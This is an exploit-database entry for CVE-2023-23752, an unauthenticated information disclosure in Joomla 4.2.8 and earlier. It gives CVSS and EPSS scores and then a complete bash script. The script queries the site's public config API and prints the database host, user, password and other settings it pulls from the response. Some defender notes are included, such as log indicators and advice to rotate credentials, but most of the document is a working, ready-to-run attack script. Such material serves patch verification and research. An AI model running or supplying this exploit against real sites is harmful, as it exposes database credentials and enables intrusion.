zdtD4t4s3c1337DAY-ID-39621
HistoryMay 22, 2024 - 12:00 a.m.

Joomla 4.2.8 Information Disclosure Exploit

2024-05-22 00:00:00
d4t4s3c
0day.today
216
joomla
unauthenticated
information disclosure
exploit
cve-2023-23752
web application
linux

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

7.2 High

AI Score

Confidence

Low

0.949 High

EPSS

Percentile

99.3%

#!/bin/bash

# Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure

# Date: 2024-05-21
# CVE: CVE-2023-23752
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.joomla.org
# Software Link: https://downloads.joomla.org
# Version: <= 4.2.8
# Tested on: Linux
# Category: Web Application

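# Queries one Joomla! site for the unauthenticated configuration disclosure
# tracked as CVE-2023-23752 and prints the database settings found in the
# response of /api/index.php/v1/config/application?public=true.
#
# Usage:   CVE-2023-23752.sh -u <url>
# Outputs: banner and extracted fields on stdout, diagnostics on stderr.
# Exit:    0 after a completed request; 1 when -u is missing or when
#          mktemp or curl fails.
#
# Defender notes:
#   - The request is an unauthenticated GET to the path above carrying
#     public=true; that path and parameter are what to look for in web-server
#     access logs.
#   - If the fields come back populated, treat the database credentials as
#     exposed: update Joomla! and rotate them.
#   - NOTE(review): the file header gives the affected range as "<= 4.2.8";
#     confirm the range against the vendor advisory for CVE-2023-23752 before
#     using this output to decide whether a host is patched.

# The response can contain a database password; keep the scratch file private.
umask 077

url=""
while getopts ":u:" arg; do
  case "${arg}" in
    u) url=${OPTARG} ;;
    *) ;; # unknown or incomplete options are ignored
  esac
done

readonly banner='[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure'

if [ -z "${url}" ]; then
  printf '\n%s\n' "${banner}"
  printf '\n[-] Usage: CVE-2023-23752.sh -u <url>\n\n'
  exit 1
fi

printf '\n%s\n' "${banner}"

# Unpredictable scratch file instead of a fixed out.tmp in the working
# directory, removed on every exit path so the password is not left on disk.
response_file=$(mktemp) || {
  printf '[-] Could not create a temporary file\n' >&2
  exit 1
}
trap 'rm -f -- "${response_file}"' EXIT

# --insecure disables certificate verification, so the body cannot be tied to
# the intended host; everything read from it below is treated as untrusted.
if ! curl --silent --insecure \
  "${url}/api/index.php/v1/config/application?public=true" > "${response_file}"; then
  printf '[-] Request to %s failed\n' "${url}" >&2
  exit 1
fi

# Print the quoted string value of JSON key $1, or nothing when the key is
# absent. -n with the p flag stops sed from echoing the whole response under a
# field label when a (patched) host returns no such key.
json_string() {
  sed -n -E 's/.*"'"$1"'":"([^"]+)".*/\1/p' "${response_file}"
}

# Same as json_string, for an unquoted integer value.
json_number() {
  sed -n -E 's/.*"'"$1"'":([0-9]+).*/\1/p' "${response_file}"
}

# Server-supplied values are passed as printf arguments, never inside the
# format string, so backslash sequences in the response are not interpreted
# by the terminal-facing output path.
printf '\n[i] Database info:\n\n'
printf '[+] DB Type: %s\n' "$(json_string dbtype)"
printf '[+] DB Host: %s\n' "$(json_string host)"
printf '\e[92m[+] DB User: %s\e[0m\n' "$(json_string user)"
printf '\e[92m[+] DB Password: %s\e[0m\n' "$(json_string password)"
printf '[+] DB Name: %s\n' "$(json_string db)"
printf '[+] DB Prefix: %s\n' "$(json_string dbprefix)"
printf '[+] DB Encryptation: %s\n\n' "$(json_number dbencryption)"
exit 0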
